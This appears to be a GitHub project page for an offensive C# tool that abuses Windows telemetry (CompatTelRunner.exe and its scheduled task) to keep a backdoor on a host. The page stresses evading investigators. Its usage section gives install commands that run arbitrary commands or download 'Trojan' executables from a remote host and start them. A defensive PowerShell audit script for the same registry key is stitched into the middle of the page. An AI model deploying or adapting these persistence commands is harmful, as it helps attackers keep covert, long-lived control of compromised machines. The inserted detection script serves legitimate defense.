About the developer

360-Linton-Lab
160 Stars 27 Forks 6 Commits 0 Opened issues

Description

WINDOWS TELEMETRY persistence (权限维持)


TELEMETRY

Background

TELEMETRY is a C# persistence tool for Windows.

Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.

Requirements:

  • Local admin rights to install (requires the ability to write to HKLM)
  • CompatTelRunner.exe must be present on the host
  • Windows Server 2008 R2/Windows 7 through Windows Server 2019/Windows 10

Advantage

  • Uses the system's own telemetry scheduled task rather than creating a new one
  • The only artifact left for investigators to find is a suspicious registry entry
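Because the backdoor leaves nothing but a registry entry behind, a defender's audit has to look at the registry key that CompatTelRunner.exe reads and at the scheduled task that launches it. The following PowerShell script is an added example written from the defender's side; it is not part of the TELEMETRY project. It assumes the key path (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController) and the task name ("Microsoft Compatibility Appraiser" under \Microsoft\Windows\Application Experience\) described in the linked TrustedSec post; neither is named on this page.

```powershell
# Added defensive audit example (not the TELEMETRY project's code).
# Assumption: CompatTelRunner.exe executes the "Command" value of every subkey under
# this path, as documented in the TrustedSec post linked at the bottom of this page.
$TelemetryKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController'

function Get-TelemetryControllerEntry {
    # Enumerate every subkey and return its values, so an analyst can diff the
    # result against a known-good baseline taken from a clean build.
    param([string]$Path = $TelemetryKey)

    if (-not (Test-Path -Path $Path)) {
        Write-Host "Key not present: $Path"
        return
    }

    foreach ($sub in Get-ChildItem -Path $Path) {
        $props = Get-ItemProperty -Path $sub.PSPath
        # Drop the PowerShell provider properties (PSPath, PSParentPath, ...).
        $values = $props.PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |
            ForEach-Object { "$($_.Name)=$($_.Value)" }

        $command = $props.Command
        # Heuristic only: a Command that points outside the Windows directory,
        # or that invokes a shell/interpreter, deserves a closer look.
        $suspicious = $false
        if ($command) {
            $inWindowsDir = $command -like "$env:SystemRoot*"
            $usesShell    = $command -match '(?i)\b(cmd|powershell|wscript|cscript|mshta|rundll32)\b'
            $suspicious   = (-not $inWindowsDir) -or $usesShell
        }

        [pscustomobject]@{
            SubKey     = $sub.PSChildName
            Command    = $command
            Values     = ($values -join '; ')
            Suspicious = $suspicious
            LastWrite  = (Get-Item -Path $sub.PSPath).LastWriteTime
        }
    }
}

function Get-CompatAppraiserTask {
    # The task CompatTelRunner.exe is started from; confirm it is still the stock
    # Microsoft task (actions, triggers, state) and has not been altered.
    Get-ScheduledTask -TaskPath '\Microsoft\Windows\Application Experience\' `
                      -TaskName 'Microsoft Compatibility Appraiser' -ErrorAction SilentlyContinue |
        Select-Object TaskName, State,
            @{ n = 'Action';  e = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join ' ' } },
            @{ n = 'Trigger'; e = { ($_.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ',' } }
}

# Run the audit and print anything flagged.
$entries = @(Get-TelemetryControllerEntry)
$entries | Format-Table -AutoSize
$flagged = $entries | Where-Object { $_.Suspicious }
if ($flagged) {
    Write-Warning "$($flagged.Count) TelemetryController entr(y/ies) reference a non-Windows path or a shell."
}
Get-CompatAppraiserTask | Format-List
```

Run it from an elevated PowerShell session (reading HKLM subkeys here does not require elevation, but a consistent comparison across hosts is easier with one). A non-empty TelemetryController key is not proof of compromise on its own; what matters is a subkey whose Command value was not in your baseline, whose LastWriteTime does not match a patch or upgrade, or which points at a user-writable location such as the Temp directory used in the usage examples above. The same key can be watched continuously with Sysmon registry events (Event ID 13 on value set) scoped to that path.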

Command Line Usage

    ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
                                             .Imanfeng
    Features:
        Install:   -   Deployment authority maintains backdoor

Command:
    TELEMETRY.exe install /command:calc
    -   Execute command without file backdoor

    TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe
    -   Remotely download Trojan files to the specified directory for backdoor startup

    TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe
    -   Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup

    TELEMETRY.exe install /path:C:\Windows\Temp\check.exe
    -   Set path Trojan files for backdoor startup

Parameter:
    /command: -   Execute Command
    /url:     -   Download FROM
    /path:    -   Download To

  • Execute a command (fileless backdoor)
  Telemetry.exe install /command:calc

  • Download a remote payload and set it as the backdoor startup
  Telemetry.exe install /url:http://vps:8089/System.exe

Learn

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
